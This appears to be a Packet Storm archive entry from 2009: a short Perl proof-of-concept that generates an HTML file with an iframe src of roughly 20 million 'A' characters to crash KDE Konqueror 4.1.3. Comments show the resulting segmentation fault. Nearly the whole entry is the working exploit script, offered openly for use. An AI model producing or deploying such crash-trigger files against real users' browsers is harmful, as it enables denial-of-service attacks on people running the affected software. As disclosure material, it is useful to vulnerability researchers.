KDE Konqueror 4.1.3 iframe src Memory Leak Exploit

2009-01-14T00:00:00
ID PACKETSTORM:73872
Type packetstorm
Reporter Jeremy Brown
Modified 2009-01-14T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
# konq_ifsrc_ml.pl  
# KDE Konqueror 4.1.3 'iframe src' Memory Leak Exploit  
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]  
#  
# Program received signal SIGSEGV, Segmentation fault.  
# [Switching to Thread 0xb60008d0 (LWP 14550)]  
# 0xb7e06637 in memset () from /lib/tls/i686/cmov/libc.so.6  
#  
# --bf2  
# Coming soon to a terminal near you! ;)  
  
$filename = $ARGV[0];  
if(!defined($filename))  
{  
  
print "Usage: $0 <filename.html>\n";  
  
}  
  
$head = "<html>" . "\n";  
$trig = "<iframe src = \"www." . "A" x 20000000 . ".com\";";  
$foot = "\n" . "</html>";  
  
$data = $head . $trig . $foot;  
  
open(FILE, '>' . $filename);  
print FILE $data;  
close(FILE);  
  
exit;`